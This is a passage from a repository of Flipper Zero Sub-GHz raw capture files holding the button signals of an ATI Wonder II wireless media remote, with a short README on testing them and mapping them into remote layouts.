-132 327 -4552 65 -3194 97 -3582 97 -6678 433 -200 97 -98 395 -2680 197 -1060 99 -3764 63 -918 65 -856 99 -892 163 -426 99 -196 163 -66 165 -1284 65 -988 99 -860 165 -430 97 -132 131 -298 65 -1062 65 -696 67 -98 231 -3644 99 -562 99 -130 165 -658 131 -956 163 -756 65 -2140 133 -7568 263 -1032 165 -998 65 -930 99 -200 99 -132 65 -1032 97 -166 163 -334 299 -166 361 -98 65 -198 197 -164 295 -132 361 -166 165 -432 463 -198 65 -1228 297 -296 197 -6358 67 -598 131 -7140 99 -262 165 -330 65 -1152 195 -3692 65 -1822 65 -200 133 -66 65 -496 299 -6834 131 -364 133 -230 265 -628 363 -266 165 -2548 229 -394 131 -362 65 -598 99 -298 67 -198 99 -100 99 -1894 99 -5962 165 -6026 533 -262 151 -304 155 -634 129 -276 153 -492 131 -800 141 -312 133 -296 143 -290 179 -272 153 -792 139 -464 157 -438 161 -604 163 -286 153 -272 155 -632 159 -91312 437 -300 137 -304 123 -648 133 -322 141 -464 127 -802 135 -302 155 -304 125 -306 123 -328 135 -786 163 -438 165 -452 175 -612 139 -304 125 -328 141 -624 139 -91324 427 -314 107 -328 141 -622 131 -336 105 -494 133 -794 137 -304 125 -326 141 -282 139 -304 141 -790 165 -450 139 -480 133 -624 139 -310 137 -292 153 -634 131 -143466 65 -2376 67 -2852 67 -7002 263 -1130 167 -6358 131 -798 99 -198 263 -1190 101 -7490 97 -100 97 -1018 99 -658 65 -7286 199 -168 65 -166 329 -198 465 -2556 65 -898 265 -398 65 -300 65 -332 129 -100 99 -298 131 -564 131 -664 165 -624 131 -66 331 -264 163 -888 165 -460 97 -362 557 -132 97 -66 165 -98 65 -362 299 -230 97 -330 131 -426 65 -198 231 -920 63 -100 163 -166 325 -198 229 -6116 65 -232 65 -7034 99 -200 231 -532 99 -166 97 -334 197 -430 133 -932 65 -866 65 -7090 99 -1424 97 -1452 393 -198 63 -198 131 -328 99 -624 229 -132 129 -164 231 -7094 197 -168 99 -396 99 -334 131 -432 65 -132 131 -330 99 -166 99 -296 133 -232 197 -166 97 -262 131 -430 329 -398 131 -200 199 -134 133 -396 99 -298 263 -664 133 -398 65 -864 99 -892 65 -328 429 -66 131 -198 133 -66 65 -232 131 -300 761 -166 97 -4974 129 -132 63 -6866 197 -428 65 -392 65 -166 97 -230 165 -730 99 -66 99 -330 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/F.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 434075000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -756 361 -6516 67 -13396 65 -17276 99 -18038 65 -6116 67 -3322 65 -16714 479 -286 181 -286 137 -608 163 -284 151 -470 169 -748 163 -276 153 -306 173 -272 157 -276 153 -798 155 -430 165 -460 169 -438 167 -784 131 -798 153 -438 165 -90448 453 -252 151 -304 125 -668 131 -274 155 -476 131 -796 127 -308 173 -272 161 -280 155 -274 155 -802 169 -424 173 -452 131 -470 169 -788 131 -798 155 -466 131 -90448 405 -5340 65 -544 65 -542 69 -530 63 -872 101 -856 65 -536 67 -90492 409 -3980 63 -420 67 -404 67 -524 67 -540 67 -540 97 -850 65 -870 103 -496 97 -154264 65 -1526 65 -632 65 -3160 65 -1694 65 -18438 97 -7590 99 -15758 97 -7902 65 -4088 67 -434 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Fullscreen.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 165 -166 165 -1820 231 -1094 197 -300 131 -166 65 -756 361 -2544 129 -196 133 -5530 65 -2042 163 -1220 97 -9622 65 -330 129 -730 131 -7444 295 -496 131 -294 97 -2568 131 -6984 131 -1152 65 -4042 199 -8090 97 -1994 99 -232 67 -732 131 -1494 65 -566 99 -1856 165 -400 163 -396 65 -132 131 -132 197 -1946 165 -596 197 -1752 99 -66 97 -630 131 -1096 131 -300 131 -134 167 -7222 65 -1320 97 -8710 131 -4968 479 -284 177 -272 153 -630 133 -322 143 -428 175 -782 131 -324 145 -286 139 -304 143 -290 179 -756 167 -424 165 -450 163 -778 163 -438 165 -452 153 -474 131 -90910 423 -312 101 -328 125 -634 131 -324 143 -472 101 -824 129 -334 105 -326 141 -272 155 -326 107 -812 133 -450 163 -452 139 -810 131 -494 137 -452 141 -478 135 -90902 421 -280 135 -296 153 -634 131 -306 155 -470 129 -810 133 -322 141 -272 123 -322 141 -314 133 -810 135 -458 133 -492 133 -802 129 -472 129 -478 141 -442 167 -90872 461 -292 93 -350 93 -666 131 -308 125 -506 97 -838 97 -340 123 -320 99 -342 105 -362 105 -798 131 -492 101 -496 137 -794 131 -492 101 -510 103 -504 101 -168070 97 -1350 65 -8018 163 -264 99 -566 65 -7336 199 -1394 65 -8308 165 -166 199 -8156 99 -360 65 -164 129 -7346 97 -1166 65 -1232 165 -1192 65 -6796 97 -392 99 -592 165 -66 99 -266 199 -2188 99 -796 65 -132 97 -432 65 -1458 295 -926 197 -624 131 -132 163 -2250 99 -726 99 -960 97 -200 65 -460 131 -7410 97 -1258 65 -266 65 -100 97 -6758 65 -7230 297 -66 99 -1592 65 -7194 163 -1194 65 -234 131 -7012 99 -730 231 -1064 363 -6996 65 -862 231 -6512 99 -2540 163 -1788 97 -502 99 -66 99 -460 131 -330 63 -626 99 -432 99 -1892 131 -200 131 -2686 231 -9766 65 -8786 99 -428 65 -8928 195 -6712 97 -1360 65 -130 131 -464 329 -1316 65 -164 131 -426 65 -434 99 -566 65 -632 97 -954 263 -692 97 -1226 97 -298 131 -166 133 -298 63 -200 99 -7398 65 -1228 165 -134 67 -496 129 -2450 65 -198 99 -234 297 -432 231 -164 133 -100 97 -1258 97 -362 165 -2058 65 -1066 65 -198 197 -600 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Hand.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -1030 99 -830 131 -332 165 -760 99 -98 129 -1654 65 -2018 165 -598 131 -1298 65 -756 361 -6762 133 -528 67 -998 99 -7360 65 -232 163 -920 97 -592 131 -7628 97 -100 65 -198 65 -164 65 -6842 97 -624 131 -260 163 -6964 63 -298 63 -1560 65 -1328 131 -6590 65 -630 99 -166 67 -266 65 -7838 133 -132 65 -200 65 -3120 65 -134 99 -262 99 -4442 67 -200 229 -628 133 -2834 97 -132 133 -66 65 -362 197 -326 295 -230 67 -428 425 -966 99 -234 299 -1448 163 -1796 131 -4812 263 -132 99 -298 65 -66 429 -6548 65 -862 99 -928 67 -330 67 -728 165 -1060 131 -1064 65 -1126 67 -1892 163 -1316 479 -308 139 -314 141 -624 135 -318 139 -454 141 -802 131 -306 123 -306 153 -300 139 -620 167 -776 163 -438 165 -450 155 -798 131 -444 183 -260 169 -280 181 -90874 417 -344 63 -372 61 -720 63 -882 65 -514 103 -532 65 -868 69 -528 65 -378 67 -370 97 -90892 415 -4032 69 -868 65 -550 67 -526 101 -838 99 -508 103 -336 97 -346 93 -90926 419 -310 141 -290 141 -622 131 -324 123 -468 135 -820 129 -308 123 -308 137 -306 125 -668 129 -804 129 -472 131 -476 123 -822 131 -444 155 -322 133 -314 141 -151462 163 -6712 297 -560 65 -558 99 -132 97 -268 65 -7926 165 -1492 99 -7960 65 -394 197 -262 197 -1058 67 -7294 99 -7868 97 -100 97 -132 65 -196 63 -392 97 -6560 65 -2662 131 -166 165 -366 65 -232 99 -862 99 -932 65 -1260 99 -66 97 -890 229 -232 63 -992 101 -268 131 -396 99 -1020 131 -986 165 -292 197 -6070 99 -1020 97 -560 99 -7852 163 -394 99 -4932 97 -690 99 -1816 65 -164 163 -230 65 -2614 65 -1482 65 -7208 129 -7152 165 -296 65 -198 97 -16456 395 -1016 229 -424 65 -2920 65 -132 133 -2116 67 -266 99 -862 131 -100 131 -364 131 -926 97 -66 165 -66 133 -1126 97 -298 229 -854 99 -230 163 -164 231 -430 67 -1628 199 -66 67 -594 65 -130 65 -364 65 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Help.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -4296 65 -1094 131 -266 97 -66 97 -362 65 -1512 197 -562 97 -756 361 -7080 295 -6726 65 -458 65 -8738 99 -7398 133 -7828 65 -922 65 -7740 133 -7604 65 -668 99 -9924 165 -8248 65 -196 63 -230 65 -6146 165 -396 131 -164 99 -426 65 -232 65 -1028 65 -168 165 -430 65 -662 99 -1392 65 -7044 197 -1386 97 -7462 97 -7602 129 -890 129 -1744 65 -1456 99 -1720 131 -7468 97 -1874 65 -4648 519 -290 93 -360 105 -658 101 -348 101 -490 105 -836 99 -352 103 -352 103 -328 93 -666 133 -832 95 -496 131 -472 133 -654 99 -818 133 -820 133 -654 97 -89592 407 -300 151 -306 123 -636 129 -308 171 -434 159 -802 139 -302 125 -306 125 -306 155 -636 123 -822 131 -446 171 -440 159 -636 129 -802 175 -764 165 -616 135 -89574 421 -100886 433 -310 141 -290 143 -626 131 -340 141 -460 131 -798 137 -304 127 -326 143 -282 139 -648 129 -808 133 -458 165 -462 131 -642 129 -804 129 -802 139 -632 135 -156894 197 -894 197 -792 165 -7678 97 -964 133 -17448 97 -954 97 -6644 97 -7764 97 -1482 99 -1792 63 -8920 131 -7676 65 -762 65 -866 65 -2876 65 -132 65 -526 65 -524 131 -2040 65 -1020 65 -1428 131 -9536 65 -6610 97 -664 99 -1722 131 -7988 165 -1230 97 -200 101 -198 165 -8792 131 -726 99 -7130 65 -68 65 -68 65 -6420 65 -860 99 -7310 99 -396 65 -492 65 -1052 65 -7906 65 -66 131 -428 65 -7324 195 -624 63 -328 65 -100 165 -17098 131 -5806 99 -330 65 -1058 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Left.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 163 -198 99 -530 99 -134 99 -166 99 -928 99 -196 65 -928 65 -134 197 -300 99 -858 97 -132 97 -296 295 -132 129 -98 129 -66 229 -296 131 -64 395 -198 65 -200 67 -132 233 -68 131 -764 99 -756 361 -922 65 -886 99 -164 129 -198 63 -6874 99 -198 99 -98 97 -100 197 -198 161 -790 65 -198 97 -2764 131 -6690 99 -300 67 -66 65 -496 133 -1024 131 -68 165 -3778 99 -2426 65 -4794 97 -100 65 -7156 99 -232 199 -462 131 -266 65 -730 97 -5250 67 -2086 97 -296 131 -6450 65 -332 67 -2210 131 -4156 503 -312 107 -328 105 -660 99 -342 103 -494 129 -820 105 -338 97 -362 103 -326 105 -662 99 -850 97 -504 99 -486 125 -498 131 -458 133 -656 131 -660 101 -90472 423 -302 123 -302 123 -664 123 -324 135 -454 139 -810 133 -324 143 -284 137 -302 143 -628 139 -808 133 -450 163 -450 175 -450 135 -458 165 -596 169 -622 177 -90408 411 -4008 65 -402 67 -890 67 -540 65 -526 101 -510 99 -690 67 -682 103 -148848 165 -2092 67 -1126 67 -7772 265 -664 67 -266 199 -396 365 -4280 65 -132 65 -1194 165 -2848 167 -2346 131 -2990 131 -4524 65 -4288 97 -362 163 -526 197 -332 165 -798 65 -398 201 -298 167 -166 133 -264 199 -132 97 -66 233 -464 67 -330 99 -132 627 -130 99 -360 97 -100 163 -796 99 -298 163 -98 165 -164 65 -100 63 -396 165 -460 97 -264 97 -4810 65 -524 229 -4222 265 -364 163 -7460 131 -264 229 -66 295 -424 129 -3330 99 -5374 65 -532 99 -3390 161 -1522 99 -2942 65 -3774 97 -198 97 -556 131 -458 163 -198 97 -326 65 -462 129 -100 197 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Lock_screen.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 131 -462 65 -526 65 -560 97 -1086 165 -2088 297 -168 65 -402 231 -926 65 -200 133 -166 67 -962 97 -300 131 -200 131 -1294 97 -794 99 -1228 331 -696 65 -334 65 -400 65 -1720 97 -764 67 -164 99 -562 65 -756 361 -430 131 -9560 65 -7152 65 -658 65 -6326 99 -5082 65 -964 199 -2416 65 -296 131 -68 65 -1084 129 -558 65 -7822 65 -1258 67 -8778 67 -17566 265 -1264 129 -818 67 -2812 65 -830 133 -730 65 -532 97 -134 65 -398 65 -596 133 -200 97 -460 131 -164 195 -988 97 -1484 65 -626 131 -592 131 -5920 199 -1154 99 -16748 197 -7586 165 -12090 131 -6914 99 -298 65 -362 475 -292 143 -314 135 -642 129 -286 153 -470 133 -820 133 -288 143 -306 127 -306 125 -666 131 -800 123 -492 131 -458 133 -628 165 -456 165 -460 137 -618 165 -90410 461 -101110 429 -326 59 -384 69 -716 65 -344 95 -340 93 -356 97 -688 97 -848 63 -538 99 -486 125 -656 103 -504 97 -504 131 -646 97 -90488 435 -308 105 -304 125 -664 131 -306 125 -470 131 -814 131 -306 123 -330 137 -300 123 -664 131 -794 127 -470 163 -442 173 -600 171 -458 127 -470 131 -632 163 -147384 331 -6764 265 -232 65 -330 165 -266 97 -196 131 -4438 65 -1092 165 -98 99 -1566 99 -196 63 -858 99 -264 67 -2206 129 -330 231 -330 165 -398 723 -300 99 -166 365 -264 97 -66 729 -66 165 -266 133 -66 67 -332 297 -132 529 -432 365 -298 163 -334 661 -100 297 -196 131 -230 99 -296 97 -100 429 -530 233 -132 433 -464 463 -66 131 -6766 199 -200 99 -1180 65 -6598 131 -198 261 -6644 65 -1954 99 -132 99 -2768 65 -266 65 -962 99 -632 65 -168 65 -662 65 -1958 133 -434 99 -1750 67 -198 265 -198 65 -428 65 -856 65 -6854 99 -530 99 -300 99 -7034 65 -1086 65 -1418 99 -498 129 -198 131 -2266 97 -5140 67 -5892 97 -430 65 -64 231 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Mouse_down.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 165 -1630 361 -27256 65 -26782 65 -29094 97 -9190 197 -860 133 -19630 67 -18156 65 -17222 63 -462 97 -4576 65 -1414 65 -134 65 -2908 65 -698 65 -11830 201 -49094 99 -10184 97 -5150 65 -6438 97 -4300 133 -6608 65 -17718 99 -2678 65 -4574 65 -20086 65 -852 63 -3224 131 -6678 485 -290 97 -344 93 -664 131 -318 141 -490 99 -820 133 -312 105 -324 143 -306 127 -646 133 -790 135 -494 137 -452 133 -322 141 -794 133 -814 139 -790 131 -16256 415 -288 181 -248 167 -604 163 -282 153 -468 169 -750 163 -276 153 -304 175 -272 157 -596 163 -800 161 -440 163 -446 153 -298 137 -788 167 -756 169 -784 167 -16216 405 -5668 67 -886 65 -550 67 -364 61 -884 69 -862 97 -832 95 -16076 379 -316 121 -288 167 -616 165 -262 153 -468 169 -788 131 -324 145 -440 135 -322 141 -424 173 -278 165 -802 135 -286 179 -19986 423 -262 151 -326 143 -590 173 -272 155 -462 169 -780 133 -322 143 -430 173 -282 173 -416 173 -276 163 -766 161 -278 181 -19994 391 -27618 411 -286 159 -284 177 -592 175 -272 165 -456 139 -786 167 -288 145 -432 173 -284 175 -418 173 -442 169 -790 131 -300 179 -19528 427 -280 179 -254 177 -618 131 -298 179 -426 167 -778 177 -270 127 -464 171 -278 179 -428 165 -452 129 -802 163 -274 153 -19570 423 -282 143 -290 143 -614 161 -296 179 -426 167 -762 171 -272 155 -450 163 -312 143 -428 167 -462 135 -808 135 -322 143 -19530 411 -320 143 -276 165 -602 163 -294 139 -462 167 -794 139 -272 155 -452 163 -310 143 -460 133 -464 135 -812 135 -322 143 -18894 421 -294 151 -292 141 -648 139 -272 155 -462 169 -782 133 -278 153 -490 129 -276 155 -466 163 -438 173 -770 165 -290 145 -146712 199 -2212 97 -7308 131 -17436 131 -11728 99 -39170 67 -298 99 -1260 65 -734 65 -8056 97 -4424 65 -1446 65 -6186 65 -3784 99 -5402 101 -2188 131 -234 65 -7152 63 -6286 99 -7848 99 -570 97 -7424 265 -134 65 -7366 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Mouse_left.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -4182 163 -756 589 -182 181 -19960 407 -288 165 -310 143 -630 137 -282 171 -420 171 -804 131 -292 179 -420 169 -286 143 -458 175 -278 135 -610 163 -298 179 -19922 419 -306 141 -272 157 -630 161 -280 155 -470 133 -782 163 -274 155 -474 129 -308 123 -468 167 -296 121 -632 163 -274 155 -19964 421 -788 63 -20012 443 -252 151 -304 155 -600 161 -278 181 -460 131 -798 155 -300 137 -454 153 -300 139 -454 177 -450 133 -624 175 -280 135 -18916 417 -334 91 -336 93 -696 95 -328 99 -490 125 -828 97 -354 93 -500 133 -300 125 -500 135 -460 127 -670 95 -308 171 -143128 133 -900 163 -402 65 -1998 65 -8458 163 -5144 297 -828 165 -100 65 -362 97 -5558 99 -860 65 -7808 99 -7744 65 -130 65 -17708 65 -7750 131 -9112 165 -17100 99 -132 65 -48930 99 -7822 65 -2048 97 -524 65 -3846 131 -8226 65 -8624 65 -5014 97 -434 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Mouse_right.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 165 -166 99 -430 99 -2866 361 -9496 65 -13024 481 -290 121 -306 155 -634 131 -306 125 -468 161 -802 129 -306 123 -324 137 -314 143 -290 145 -798 131 -456 159 -438 173 -274 161 -800 129 -802 141 -796 165 -15988 417 -324 141 -272 155 -614 167 -288 143 -468 137 -788 167 -282 141 -326 141 -276 143 -326 107 -794 165 -456 129 -466 171 -274 179 -756 165 -778 161 -768 155 -16740 417 -276 179 -290 145 -594 167 -312 143 -428 165 -778 175 -274 163 -284 143 -290 175 -276 143 -796 163 -446 141 -444 169 -286 179 -758 165 -786 171 -750 167 -16508 421 -304 103 -336 93 -690 99 -358 69 -536 67 -846 97 -354 93 -504 97 -344 103 -526 97 -312 125 -338 93 -366 101 -20516 417 -278 143 -292 179 -590 165 -272 179 -428 167 -780 175 -272 163 -444 167 -266 153 -462 167 -272 179 -256 179 -272 153 -20490 411 -286 181 -242 159 -644 131 -324 145 -444 171 -754 163 -282 153 -468 169 -268 151 -434 173 -274 155 -304 155 -274 153 -19370 435 -270 137 -304 123 -664 131 -306 125 -468 165 -780 129 -308 153 -468 131 -308 123 -468 163 -284 153 -274 155 -306 173 -137278 133 -1132 131 -6774 65 -7140 99 -1162 65 -1160 165 -1792 67 -1694 65 -792 65 -8058 99 -7742 165 -832 99 -1328 133 -8582 65 -196 65 -17090 97 -2090 67 -1788 99 -596 99 -526 99 -230 99 -530 67 -400 65 -1796 65 -1422 63 -362 229 -3352 97 -230 65 -918 197 -598 99 -1654 99 -634 99 -734 99 -2588 65 -200 65 -198 133 -9270 99 -5602 99 -2852 233 -232 97 -164 163 -760 265 -132 199 -1490 65 -364 165 -398 365 -166 227 -1312 229 -230 165 -2378 229 -822 99 -8780 65 -7778 99 -16750 165 -1648 195 -630 65 -3292 65 -428 163 -756 97 -1018 163 -8596 67 -462 99 -2722 65 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Mute.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 55699 -100 97381 -19292 263 -100 65 -232 65 -266 231 -464 299 -68 201 -98 99 -132 331 -66 759 -66 41811 -278 143 -292 143 -624 165 -262 153 -468 169 -786 133 -324 143 -274 129 -326 143 -288 141 -780 169 -458 133 -454 159 -294 177 -256 179 -758 163 -438 167 -91338 407 -320 141 -286 139 -650 131 -296 139 -462 133 -828 137 -272 157 -326 143 -282 137 -302 143 -790 131 -482 139 -478 135 -286 179 -270 153 -784 175 -434 171 -91310 411 -314 141 -326 107 -658 97 -342 105 -494 99 -826 137 -304 127 -318 141 -324 105 -330 123 -798 139 -478 133 -458 133 -324 141 -312 131 -806 133 -458 131 -91348 425 -292 153 -276 155 -634 131 -306 155 -470 129 -802 129 -308 121 -326 137 -314 143 -290 143 -796 131 -468 169 -420 157 -278 169 -274 155 -792 169 -458 133 -91346 427 -4877 67 -558 63 -548 63 -376 93 -848 97 -516 103 -165180 163 -294 395 -264 133 -198 97 -166 399 -68 365 -200 4667 -100 17605 -18774 231 -166 199 -100 131 -100 265 -100 233 -100 297 -198 1197 -66 10031 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Ok.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 97 -856 131 -198 295 -64 197 -260 263 -132 195 -362 133 -432 65 -302 231 -198 133 -266 97 -262 131 -164 99 -162 261 -164 163 -394 65 -164 231 -228 65 -362 229 -198 65 -492 131 -720 495 -358 197 -524 131 -3290 165 -726 97 -856 231 -164 131 -392 129 -1546 129 -528 65 -66 197 -100 65 -298 199 -600 65 -166 65 -494 459 -100 329 -398 67 -66 165 -436 131 -98 133 -1724 359 -622 129 -790 131 -1844 65 -232 67 -3518 99 -5828 97 -3182 65 -3114 65 -3884 97 -970 231 -3910 131 -796 65 -4334 133 -266 163 -266 299 -332 67 -830 199 -132 131 -168 169 -594 97 -362 65 -992 99 -134 131 -200 131 -100 293 -264 131 -98 197 -3844 65 -6634 97 -690 65 -754 99 -524 99 -624 97 -330 261 -164 163 -986 133 -1426 131 -132 99 -232 99 -926 133 -1360 65 -368 525 -296 263 -364 65 -134 131 -268 131 -100 333 -860 99 -1360 165 -1892 133 -6038 507 -286 143 -304 127 -630 131 -318 141 -466 133 -820 133 -312 141 -290 143 -274 157 -304 125 -800 175 -434 159 -472 129 -444 173 -438 159 -802 139 -274 157 -90894 435 -101050 461 -294 61 -416 93 -342 93 -356 99 -374 69 -854 65 -526 95 -514 97 -506 101 -526 97 -838 101 -334 93 -148312 67 -98 165 -1990 131 -7120 65 -132 163 -164 63 -198 99 -1122 97 -132 65 -198 163 -428 229 -66 97 -894 65 -2248 65 -724 97 -400 165 -100 99 -168 99 -398 131 -134 97 -920 529 -892 65 -656 99 -364 99 -166 467 -1820 67 -166 133 -1360 131 -166 65 -1062 99 -3254 131 -6702 133 -234 97 -764 65 -200 99 -334 265 -7198 99 -200 99 -100 133 -398 99 -396 97 -820 97 -2506 163 -756 65 -1708 97 -2878 133 -5036 97 -2572 97 -2180 99 -6280 65 -3548 99 -200 197 -364 99 -566 65 -264 131 -822 65 -3890 131 -458 131 -1786 65 -600 65 -2774 131 -2020 131 -632 65 -100 395 -556 65 -66 97 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Pc.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 97 -100 67 -1162 65 -1064 163 -756 361 -17180 67 -17748 65 -562 67 -16964 65 -100 97 -1722 65 -932 97 -5014 65 -7816 99 -2040 65 -66 163 -592 99 -1254 133 -232 97 -198 267 -798 65 -134 99 -3342 97 -526 65 -1330 65 -66 197 -394 165 -198 63 -756 65 -7290 131 -1990 65 -5118 63 -1262 133 -66 65 -690 65 -130 295 -622 99 -494 163 -1752 441 -350 105 -314 135 -644 131 -286 155 -470 133 -820 133 -324 107 -306 129 -324 141 -284 139 -814 133 -460 131 -494 133 -284 155 -798 123 -822 129 -804 127 -90016 419 -316 89 -364 103 -662 101 -346 103 -490 139 -802 129 -312 125 -306 125 -328 135 -300 125 -828 127 -478 131 -470 137 -302 127 -832 101 -840 101 -824 131 -90018 437 -272 173 -270 153 -632 131 -306 123 -470 165 -780 161 -276 153 -280 169 -272 157 -304 155 -766 155 -454 165 -460 169 -284 145 -794 133 -798 139 -798 163 -89974 415 -5340 63 -882 67 -538 65 -556 65 -870 65 -870 101 -169962 163 -626 99 -856 99 -260 131 -7834 165 -7150 97 -494 97 -394 97 -5842 67 -600 133 -2450 65 -6686 67 -2050 97 -7518 131 -7544 129 -626 65 -426 97 -330 163 -3880 99 -364 165 -826 131 -132 199 -1162 165 -734 97 -534 65 -432 133 -728 233 -132 297 -496 65 -9508 131 -1228 67 -6932 99 -236 133 -796 65 -98 131 -66 65 -6546 165 -998 99 -1168 131 -6784 229 -394 263 -1496 65 -132 99 -3174 99 -6720 99 -132 97 -264 65 -594 65 -8890 131 -6694 65 -564 99 -2280 199 -566 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Play.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 434075000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 8595 -66 301 -66 559 -66 2633 -66 1347 -98 2067 -64 1255 -68 6797 -98 1467 -66 3845 -98 1417 -132 425 -66 13829 -68 1829 -66 99 -134 5639 -132 1097 -100 2215 -100 7731 -68 297 -100 8995 -262 121 -336 95 -666 129 -308 125 -492 99 -854 103 -334 123 -326 105 -314 135 -646 129 -808 129 -472 129 -482 123 -324 135 -620 131 -814 133 -322 141 -80504 65 -166 99 -964 233 -628 731 -100 133 -66 529 -398 231 -66 1479 -132 561 -100 581 -330 61 -390 63 -734 65 -884 69 -360 69 -372 63 -704 97 -838 97 -506 99 -512 103 -338 95 -674 97 -840 97 -340 93 -90458 423 -380 69 -358 69 -692 65 -406 67 -528 65 -852 103 -336 97 -360 69 -394 69 -694 65 -852 99 -504 99 -520 93 -330 101 -686 99 -818 133 -320 107 -91622 131 -166 167 -234 65 -232 563 -132 9389 -66 15923 -100 8805 -98 13153 -68 4311 -98 1839 -132 1393 -98 2091 -68 16089 -66 1215 -98 629 -66 13351 -66 1923 -132 18193 -98 10601 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Power.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 67 -30250 63 -260 99 -1316 65 -164 99 -756 361 -9278 67 -36732 133 -8710 99 -788 479 -288 155 -278 155 -634 131 -306 155 -470 131 -802 129 -308 121 -326 135 -316 143 -622 137 -792 167 -438 169 -422 155 -306 175 -272 155 -764 169 -286 179 -90846 399 -4024 63 -388 67 -880 65 -550 97 -340 93 -356 99 -850 99 -338 95 -90914 417 -4426 63 -396 67 -690 65 -882 63 -540 65 -552 63 -356 99 -342 103 -858 67 -364 93 -165736 65 -17246 65 -19032 67 -332 97 -2408 99 -1060 97 -502 131 -132 99 -17220 131 -2086 65 -26286 67 -3552 165 -8152 65 -16960 131 -1248 99 -8522 67 -7172 133 -5872 99 -3222 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/README.md: -------------------------------------------------------------------------------- 1 | A complete (I think) capture of an ATI Wonder II remote. These are raw captures. 2 | 3 | This device works over SubGhz to a receiver station. 4 | 5 | I have tested what I could using the Linux kernel driver on a regular desktop. A lot will depend on your setup and what input is assigned to which action. It has not been tested on Windows. Not all keys could be tested. 6 | 7 | I had issues nailing down the exact frequency, so I've done my best. They may need to be adjusted. 8 | 9 | # Remotes 10 | I have included some convenient remote maps, if you're able to sue the Sub-GHz Remote app. Copy the .ir files into /etc/subghz/ATI_Wonder_II/ and then place the remote .txt files into /etc/subhgz/remote 11 | 12 | Ati_media: 13 | Controls Vol Up/Down, Play/Pause, Rew, FF. No room for a Mute button. 14 | 15 | Ati_media_alt: (More useful for Youtube on desktop) 16 | Fullscreen toggle, Play, Left, Right 17 | 18 | Ati_mouse: 19 | This remote is almost useless, since it's hard to get the speed captured right for the mouse movement. The remote layout also doesn't allow a right-click. 20 | 21 | Ati_arrows: 22 | Just a mapping for just the directional arrows and OK button. 23 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/Rclick.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 98627 -134 267 -66 58103 -132 7687 -314 105 -342 97 -666 99 -352 103 -518 101 -820 99 -342 105 -360 105 -306 127 -354 69 -852 99 -486 135 -494 103 -676 105 -662 101 -658 133 -654 99 -88428 407 -352 103 -310 99 -680 97 -354 93 -502 99 -852 97 -340 93 -368 103 -302 123 